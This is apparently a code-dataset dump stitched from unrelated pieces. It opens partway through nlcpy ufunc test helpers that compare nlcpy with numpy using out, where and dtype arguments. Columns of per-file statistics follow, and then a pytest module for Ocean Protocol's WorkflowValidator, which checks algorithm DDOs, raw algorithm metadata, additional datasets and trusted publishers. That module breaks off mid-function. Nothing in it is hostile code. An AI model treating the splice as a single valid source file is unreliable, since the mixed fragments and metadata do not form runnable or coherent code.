    ``kw[name_where]``.  When *is_broadcast* is set, ``out`` gets a leading
    length-2 axis and ``where`` is resized to match.  Raises TypeError for
    an unknown *mode*.
    """
    if mode == 'array_array':
        # p = ((shape1, shape2), order_x, order_y, order_out, order_where,
        #      dtype_x, dtype_y, dtype_out, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_y, order_out, order_where,
            dtype_x, dtype_y, dtype_out, order_arg, casting)
    elif mode == 'array_scalar':
        # p = ((shape1, _), order_x, order_out, order_where, dtype_x,
        #      dtype_y, dtype_out, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_out, order_where, dtype_x,
            dtype_y, dtype_out, order_arg, casting)
    elif mode == 'scalar_scalar':
        # p = (order_out, order_where, dtype_x, dtype_y, dtype_out, casting)
        param = itertools.product(
            order_out, order_where, dtype_x, dtype_y, dtype_out, casting)
    else:
        raise TypeError('unknown mode was detected.')
    for p in param:
        if mode == 'array_array':
            shape1 = p[0][0]
            shape2 = p[0][1]
            order = p[8]
            casting = p[9]
            in1 = ufunc._create_random_array(shape1, p[1], p[5], minval, maxval)
            in2 = ufunc._create_random_array(shape2, p[2], p[6], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[3], p[7], ufunc_name, is_broadcast)
            # random boolean mask with the same shape as out
            where = ufunc._create_random_array(
                out.shape, p[4], ufunc.DT_BOOL, minval, maxval)
            worst_dtype = ufunc._guess_worst_dtype(
                (in1.dtype, in2.dtype, out.dtype))
        elif mode == 'array_scalar':
            shape1 = p[0][0]
            order = p[7]
            casting = p[8]
            in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
            in2 = ufunc._create_random_scalar(p[5], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[2], p[6], ufunc_name, is_broadcast)
            where = ufunc._create_random_array(
                out.shape, p[3], ufunc.DT_BOOL, minval, maxval)
            dt_in2 = numpy.dtype(p[5])
            worst_dtype = ufunc._guess_worst_dtype(
                (in1.dtype, dt_in2, out.dtype))
        elif mode == 'scalar_scalar':
            order = 'K'
            casting = p[5]
            in1 = ufunc._create_random_scalar(p[2], minval, maxval)
            in2 = ufunc._create_random_scalar(p[3], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[0], p[4], ufunc_name, is_broadcast)
            where = ufunc._create_random_array(
                out.shape, p[1], ufunc.DT_BOOL, minval, maxval)
            dt_in1 = numpy.dtype(p[2])
            dt_in2 = numpy.dtype(p[3])
            worst_dtype = ufunc._guess_worst_dtype(
                (dt_in1, dt_in2, out.dtype))
        # expand shape for broadcast
        if is_broadcast:
            where = numpy.resize(where, ((2,) + where.shape))
        kw[name_in1] = in1
        kw[name_in2] = in2
        kw[name_out] = out
        kw[name_where] = where
        # order/casting keyword arguments are only passed for <ufunc>.outer
        if ufunc_name == 'outer':
            kw[name_order] = order
            kw[name_casting] = casting
        nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
            self, args, kw, impl, name_xp, op, True, Exception)
        # result check (only when both sides produced a result)
        if nlcpy_result is not None and numpy_result is not None:
            for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
                ufunc._check_ufunc_result(
                    op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
                    out=out, where=where)
def _check_binary_with_out_with_where_with_dtype(
        self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
        name_out, name_where, name_dtype, op, minval, maxval, shape,
        order_x, order_y, order_out, order_where, order_arg, dtype_x, dtype_y,
        dtype_out, dtype_arg, mode, ufunc_name, casting):
    """Compare nlcpy vs numpy for *op* with ``out``, ``where`` and ``dtype``.

    The most complete sweep: adds both a random boolean ``where`` mask
    (shaped like ``out``) and an explicit *dtype_arg* axis on top of the
    ``out`` variant.  No broadcast axis is added in this variant.  Raises
    TypeError for an unknown *mode*.
    """
    if mode == 'array_array':
        # p = ((shape1, shape2), order_x, order_y, order_out, order_where,
        #      dtype_x, dtype_y, dtype_out, dtype_arg, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_y, order_out, order_where,
            dtype_x, dtype_y, dtype_out, dtype_arg, order_arg, casting)
    elif mode == 'array_scalar':
        # p = ((shape1, _), order_x, order_out, order_where, dtype_x,
        #      dtype_y, dtype_out, dtype_arg, order_arg, casting)
        param = itertools.product(
            shape, order_x, order_out, order_where, dtype_x,
            dtype_y, dtype_out, dtype_arg, order_arg, casting)
    elif mode == 'scalar_scalar':
        # p = (order_out, order_where, dtype_x, dtype_y, dtype_out,
        #      dtype_arg, casting)
        param = itertools.product(
            order_out, order_where, dtype_x, dtype_y, dtype_out,
            dtype_arg, casting)
    else:
        raise TypeError('unknown mode was detected.')
    for p in param:
        if mode == 'array_array':
            shape1 = p[0][0]
            shape2 = p[0][1]
            order = p[9]
            casting = p[10]
            in1 = ufunc._create_random_array(shape1, p[1], p[5], minval, maxval)
            in2 = ufunc._create_random_array(shape2, p[2], p[6], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[3], p[7], ufunc_name)
            # random boolean mask with the same shape as out
            where = ufunc._create_random_array(
                out.shape, p[4], ufunc.DT_BOOL, minval, maxval)
            dtype = numpy.dtype(p[8])
            worst_dtype = ufunc._guess_worst_dtype(
                (in1.dtype, in2.dtype, out.dtype, dtype))
        elif mode == 'array_scalar':
            shape1 = p[0][0]
            order = p[8]
            casting = p[9]
            in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
            in2 = ufunc._create_random_scalar(p[5], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[2], p[6], ufunc_name)
            where = ufunc._create_random_array(
                out.shape, p[3], ufunc.DT_BOOL, minval, maxval)
            dt_in2 = numpy.dtype(p[5])
            dtype = numpy.dtype(p[7])
            worst_dtype = ufunc._guess_worst_dtype(
                (in1.dtype, dt_in2, out.dtype, dtype))
        elif mode == 'scalar_scalar':
            order = 'K'
            casting = p[6]
            in1 = ufunc._create_random_scalar(p[2], minval, maxval)
            in2 = ufunc._create_random_scalar(p[3], minval, maxval)
            in1, in2 = _recreate_array_or_scalar(op, in1, in2)
            out = _create_out_array(in1, in2, p[0], p[4], ufunc_name)
            where = ufunc._create_random_array(
                out.shape, p[1], ufunc.DT_BOOL, minval, maxval)
            dt_in1 = numpy.dtype(p[2])
            dt_in2 = numpy.dtype(p[3])
            dtype = numpy.dtype(p[5])
            worst_dtype = ufunc._guess_worst_dtype(
                (dt_in1, dt_in2, out.dtype, dtype))
        kw[name_in1] = in1
        kw[name_in2] = in2
        kw[name_out] = out
        kw[name_where] = where
        kw[name_dtype] = dtype
        # order/casting keyword arguments are only passed for <ufunc>.outer
        if ufunc_name == 'outer':
            kw[name_order] = order
            kw[name_casting] = casting
        nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
            self, args, kw, impl, name_xp, op, True, Exception)
        # result check (only when both sides produced a result)
        if nlcpy_result is not None and numpy_result is not None:
            for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
                ufunc._check_ufunc_result(
                    op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
                    out=out, where=where, dtype=dtype)
| 42.142342
| 88
| 0.577622
| 3,131
| 23,389
| 4.051741
| 0.072501
| 0.027432
| 0.056283
| 0.022702
| 0.856062
| 0.845499
| 0.837853
| 0.810421
| 0.808529
| 0.801513
| 0
| 0.035532
| 0.320151
| 23,389
| 554
| 89
| 42.218412
| 0.762279
| 0.078498
| 0
| 0.718163
| 0
| 0
| 0.032589
| 0
| 0
| 0
| 0
| 0.001805
| 0
| 1
| 0.016701
| false
| 0
| 0.010438
| 0
| 0.031315
| 0.002088
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80f15340b11f379acd3b89e68aa87be8bbeef266
| 32,692
|
py
|
Python
|
ocean_provider/validation/test/test_algo_validation.py
|
oceanprotocol/provider-service-py
|
408a9032b30d3606a6b991f3982b7d17ded7cd47
|
[
"Apache-2.0"
] | null | null | null |
ocean_provider/validation/test/test_algo_validation.py
|
oceanprotocol/provider-service-py
|
408a9032b30d3606a6b991f3982b7d17ded7cd47
|
[
"Apache-2.0"
] | null | null | null |
ocean_provider/validation/test/test_algo_validation.py
|
oceanprotocol/provider-service-py
|
408a9032b30d3606a6b991f3982b7d17ded7cd47
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2021 Ocean Protocol Foundation
# SPDX-License-Identifier: Apache-2.0
#
import copy
from unittest.mock import Mock, patch
import pytest
from ocean_provider.utils.asset import Asset
from ocean_provider.utils.basics import get_web3
from ocean_provider.utils.services import Service, ServiceType
from ocean_provider.validation.algo import WorkflowValidator
from tests.ddo.ddo_sample1_compute import alg_ddo_dict, ddo_dict
from tests.helpers.compute_helpers import get_future_valid_until
from tests.test_helpers import get_first_service_by_type
# Shared fake provider-fees event returned by the patched validate_order in
# the tests below; presumably mirrors the attributes WorkflowValidator reads
# from the on-chain event (providerData, validUntil, providerFeeAmount) —
# confirm against ocean_provider.validation.algo.
provider_fees_event = Mock()
provider_fees_event.args.providerData = {"environment": "ocean-compute"}
provider_fees_event.args.validUntil = get_future_valid_until()
provider_fees_event.args.providerFeeAmount = 0
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_passes_algo_ddo(provider_wallet, consumer_address, web3):
    """Tests happy flow of validator with algo ddo."""
    # NOTE(review): the injected web3 fixture is shadowed here; confirm the
    # reassignment to get_web3() is intentional (other tests use the fixture).
    web3 = get_web3()
    ddo = Asset(ddo_dict)
    alg_ddo = Asset(alg_ddo_dict)
    sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    # compute-job payload: dataset via its compute service, published
    # algorithm DDO via its access service
    data = {
        "dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
        "algorithm": {
            "documentId": alg_ddo.did,
            "serviceId": sa_compute.id,
            "transferTxId": "alg_tx_id",
        },
        "environment": "ocean-compute",
    }

    def side_effect(*args, **kwargs):
        # resolve metadata-store lookups (args[1] is the DID) to the
        # in-memory assets
        nonlocal ddo, alg_ddo
        if ddo.did == args[1]:
            return ddo
        if alg_ddo.did == args[1]:
            return alg_ddo

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is True
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_passes_raw(provider_wallet, consumer_address, web3):
    """Tests happy flow of validator with raw algo."""
    # NOTE(review): the web3 fixture is shadowed here — confirm intentional.
    web3 = get_web3()
    ddo = Asset(ddo_dict)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    # algorithm supplied inline through "meta" instead of a published DDO
    data = {
        "dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
        "algorithm": {
            "serviceId": sa.id,
            "meta": {
                "rawcode": "console.log('Hello world'!)",
                "format": "docker-image",
                "version": "0.1",
                "container": {"entrypoint": "node $ALGO", "image": "node", "tag": "10"},
            },
        },
        "environment": "ocean-compute",
    }
    # only the dataset DDO needs resolving from the metadata store
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is True
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fails_not_an_algo(provider_wallet, consumer_address, web3):
    """Tests that validation fails when the algorithm documentId refers to a
    DDO that is not a valid algorithm (here: the dataset's own DID)."""
    # dataset copy with an emptied trusted-algorithms list
    _copy = copy.deepcopy(ddo_dict)
    _copy["services"][0]["compute"]["publisherTrustedAlgorithms"] = []
    ddo = Asset(_copy)
    did = ddo.did
    alg_ddo = Asset(alg_ddo_dict)
    sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    # note: "algorithm" deliberately reuses the dataset DID, not alg_ddo.did
    data = {
        "dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "documentId": did,
            "serviceId": sa_compute.id,
            "transferTxId": "alg_tx_id",
        },
    }

    def side_effect(*args, **kwargs):
        # resolve metadata-store lookups (args[1] is the DID)
        nonlocal ddo, alg_ddo
        if ddo.did == args[1]:
            return ddo
        if alg_ddo.did == args[1]:
            return alg_ddo

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert validator.error == f"DID {did} is not a valid algorithm"
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fails_meta_issues(provider_wallet, consumer_address, web3):
    """Tests validator failures for malformed algorithm metadata.

    Covers three rejections: an empty ``meta`` dict, a ``meta`` with an
    empty ``container`` section, and a ``container`` missing the ``image``
    key.
    """
    # (fix: removed a stray no-op string literal left mid-function and
    # corrected the copy-pasted "happy flow" docstring — this is a failure
    # test)
    ddo = Asset(ddo_dict)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    # algorithmMeta is empty
    data = {
        "dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
        "algorithm": {"serviceId": sa.id, "meta": {}},
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == "algorithmMeta must define one of `url` or `rawcode` or `remote`, but all seem missing."
        )
    # algorithmMeta container is empty
    data = {
        "dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa.id,
            "meta": {
                "rawcode": "console.log('Hello world'!)",
                "format": "docker-image",
                "version": "0.1",
                "container": {},
            },
        },
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == "algorithm `container` must specify values for all of entrypoint, image and tag."
        )
    # algorithmMeta container is missing image
    data = {
        "dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa.id,
            "meta": {
                "rawcode": "console.log('Hello world'!)",
                "format": "docker-image",
                "version": "0.1",
                "container": {"entrypoint": "node $ALGO", "tag": "10"},
            },
        },
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == "algorithm `container` must specify values for all of entrypoint, image and tag."
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_additional_datasets(provider_wallet, consumer_address, web3):
    """Tests validation of the optional "additionalDatasets" field: an empty
    value passes, while undecodable input, a missing documentId, an unknown
    DID and an unknown serviceId are each rejected with a specific error."""
    # NOTE(review): the web3 fixture is shadowed here — confirm intentional.
    web3 = get_web3()
    ddo = Asset(ddo_dict)
    alg_ddo = Asset(alg_ddo_dict)
    sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    data = {
        "dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
        "algorithm": {
            "documentId": alg_ddo.did,
            "serviceId": sa_compute.id,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": "",
        "environment": "ocean-compute",
    }

    def side_effect(*args, **kwargs):
        # resolve metadata-store lookups (args[1] is the DID)
        nonlocal ddo, alg_ddo
        if ddo.did == args[1]:
            return ddo
        if alg_ddo.did == args[1]:
            return alg_ddo

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        # basically the same test as test_passes_algo_ddo, additionalDatasets is empty
        assert validator.validate() is True
    # additional input is invalid
    data = {
        "dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa_compute.id,
            "documentId": alg_ddo.did,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": "i can not be decoded in json!",
    }
    # no metadata-store patch needed: validation fails on decoding, before
    # any asset lookup
    validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
    assert validator.validate() is False
    assert validator.error == "Additional input is invalid or can not be decoded."
    did = ddo.did
    # Missing did in additional input
    data = {
        "dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa_compute.id,
            "documentId": alg_ddo.did,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": [{"transferTxId": "tx_id", "serviceId": sa.id}],
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        # index 1 is the additional dataset (the main dataset is index 0)
        assert (
            validator.error == "Error in input at index 1: No documentId in input item."
        )
    # Did is not valid
    data = {
        "dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa_compute.id,
            "documentId": alg_ddo.did,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": [
            {
                "documentId": "i am not a did",
                "transferTxId": "tx_id",
                "serviceId": sa.id,
            }
        ],
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == "Error in input at index 1: Asset for did i am not a did not found."
        )
    # serviceId does not exist on the additional dataset
    data = {
        "dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa_compute.id,
            "documentId": alg_ddo.did,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": [
            {
                "documentId": did,
                "transferTxId": "tx_id",
                "serviceId": "some other service id",
            }
        ],
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == "Error in input at index 1: Service id some other service id not found."
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_service_not_compute(provider_wallet, consumer_address, web3):
    """Tests rejection when the resolved service type is neither access nor
    compute."""
    ddo = Asset(ddo_dict)
    alg_ddo = Asset(alg_ddo_dict)
    sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    data = {
        "dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa_compute.id,
            "documentId": alg_ddo.did,
            "transferTxId": "alg_tx_id",
        },
    }

    def side_effect(*args, **kwargs):
        # resolve metadata-store lookups (args[1] is the DID)
        nonlocal ddo, alg_ddo
        if ddo.did == args[1]:
            return ddo
        if alg_ddo.did == args[1]:
            return alg_ddo

    def other_service(*args, **kwargs):
        # force every service lookup to return a non-access, non-compute
        # service type
        return Service(
            index=0,
            service_id="smth_else",
            service_type="something else",
            datatoken_address="0xa",
            service_endpoint="test",
            encrypted_files="",
            timeout=3600,
        )

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        with patch(
            "ocean_provider.utils.asset.Asset.get_service_by_id",
            side_effect=other_service,
        ):
            validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
            assert validator.validate() is False
            assert validator.error == "Services in input can only be access or compute."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fails_trusted(provider_wallet, consumer_address, web3):
    """Tests possible failures of the algo validation: an additional dataset
    that trusts other algorithms, and one that trusts other publishers."""
    ddo = Asset(ddo_dict)
    alg_ddo = Asset(alg_ddo_dict)
    sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
    sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
    # Additional input has other trusted algs
    _copy = copy.deepcopy(ddo_dict)
    _copy["id"] = "0xtrust"
    _copy["services"][0]["compute"]["publisherTrustedAlgorithms"] = [
        {"did": "0xother", "filesChecksum": "mock", "containerSectionChecksum": "mock"}
    ]
    trust_ddo = Asset(_copy)
    trust_sa = get_first_service_by_type(trust_ddo, ServiceType.COMPUTE)

    def side_effect(*args, **kwargs):
        # resolves DIDs to the in-memory assets; trust_ddo is read through
        # the closure (nonlocal), so the rebinding further below is picked up
        nonlocal ddo, alg_ddo, trust_ddo
        if ddo.did == args[1]:
            return ddo
        if alg_ddo.did == args[1]:
            return alg_ddo
        if trust_ddo.did == args[1]:
            return trust_ddo

    data = {
        "dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
        "algorithm": {
            "serviceId": sa_compute.id,
            "documentId": alg_ddo.did,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": [
            {
                "documentId": trust_ddo.did,
                "transferTxId": "trust_tx_id",
                "serviceId": trust_sa.id,
            }
        ],
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == f"Error in input at index 1: this algorithm did {alg_ddo.did} is not trusted."
        )
    # Additional input has other trusted publishers
    _copy = copy.deepcopy(ddo_dict)
    _copy["id"] = "0xtrust"
    _copy["services"][0]["compute"]["publisherTrustedAlgorithmPublishers"] = ["0xabc"]
    _copy["services"][0]["id"] = "compute_2"
    trust_ddo = Asset(_copy)
    trust_sa = get_first_service_by_type(trust_ddo, ServiceType.COMPUTE)
    data = {
        "dataset": {
            "documentId": ddo.did,
            "transferTxId": "trust_tx_id",
            "serviceId": sa.id,
        },
        "algorithm": {
            "documentId": alg_ddo.did,
            "serviceId": sa_compute.id,
            "transferTxId": "alg_tx_id",
        },
        "additionalDatasets": [
            {
                "documentId": trust_ddo.did,
                "transferTxId": "trust_tx_id",
                "serviceId": trust_sa.id,
            }
        ],
    }
    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=side_effect,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
        assert validator.validate() is False
        assert (
            validator.error
            == "Error in input at index 1: this algorithm is not from a trusted publisher"
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch("ocean_provider.validation.algo.get_service_files_list", return_value=None)
def test_fails_no_asset_url(provider_wallet, consumer_address, web3):
    """Validation fails when no files list (asset URL) can be resolved for the service."""
    dataset = Asset(ddo_dict)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "serviceId": compute_service.id,
            "transferTxId": "tx_id",
        },
        "algorithm": {"serviceId": compute_service.id, "meta": {}},
    }

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=[dataset],
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert (
            validator.error
            == "Services in input with compute type must be in the same provider you are calling."
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch("ocean_provider.validation.algo.validate_order", side_effect=Exception("mock"))
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fails_validate_order(provider_wallet, consumer_address, web3):
    """An exception raised by validate_order is surfaced in the validator error."""
    dataset = Asset(ddo_dict)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "serviceId": compute_service.id,
            "transferTxId": "tx_id",
        },
        "algorithm": {"serviceId": compute_service.id, "meta": {}},
    }

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=[dataset],
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert (
            validator.error
            == f"Order for serviceId {compute_service.id} is not valid. mock."
        )
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fails_no_service_id(provider_wallet, consumer_address, web3):
    """A dataset entry whose serviceId is None is rejected outright."""
    dataset = Asset(ddo_dict)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "serviceId": None,
            "transferTxId": "tx_id",
        },
        "algorithm": {"serviceId": compute_service.id, "meta": {}},
    }

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=[dataset],
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert validator.error == "No serviceId in input item."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
@patch(
    "ocean_provider.serializers.StageAlgoSerializer.serialize",
    new=Mock(return_value={}),
)
def test_fails_invalid_algorithm_dict(provider_wallet, consumer_address, web3):
    """An empty serialized algorithm dict means no URL can be derived for the algo DID."""
    dataset = Asset(ddo_dict)
    algo = Asset(alg_ddo_dict)
    algo_service = get_first_service_by_type(algo, ServiceType.ACCESS)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "serviceId": compute_service.id,
            "transferTxId": "tx_id",
        },
        "algorithm": {
            "documentId": algo.did,
            "serviceId": algo_service.id,
            "transferTxId": "alg_tx_id",
        },
    }

    def fetch_asset(*args, **kwargs):
        # Resolve a DID to the matching in-memory asset; None if unknown.
        return {dataset.did: dataset, algo.did: algo}.get(args[1])

    with patch(
        "ocean_provider.validation.algo.get_asset_from_metadatastore",
        side_effect=fetch_asset,
    ):
        validator = WorkflowValidator(web3, consumer_address, provider_wallet, payload)
        assert validator.validate() is False
        assert validator.error == f"cannot get url for the algorithmDid {algo.did}"
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
    "ocean_provider.validation.algo.validate_order",
    return_value=(None, None, provider_fees_event),
)
@patch(
    "ocean_provider.validation.algo.get_service_files_list",
    return_value=[{"url": "dummy"}],
)
def test_fails_algorithm_in_use(provider_wallet, consumer_address, web3):
    """If recording the algorithm's consume request raises, validation reports it as in use."""
    dataset = Asset(ddo_dict)
    algo = Asset(alg_ddo_dict)
    algo_service = get_first_service_by_type(algo, ServiceType.ACCESS)
    compute_service = get_first_service_by_type(dataset, ServiceType.COMPUTE)
    payload = {
        "dataset": {
            "documentId": dataset.did,
            "serviceId": compute_service.id,
            "transferTxId": "tx_id",
        },
        "algorithm": {
            "documentId": algo.did,
            "serviceId": algo_service.id,
            "transferTxId": "alg_tx_id",
        },
    }

    def fetch_asset(*args, **kwargs):
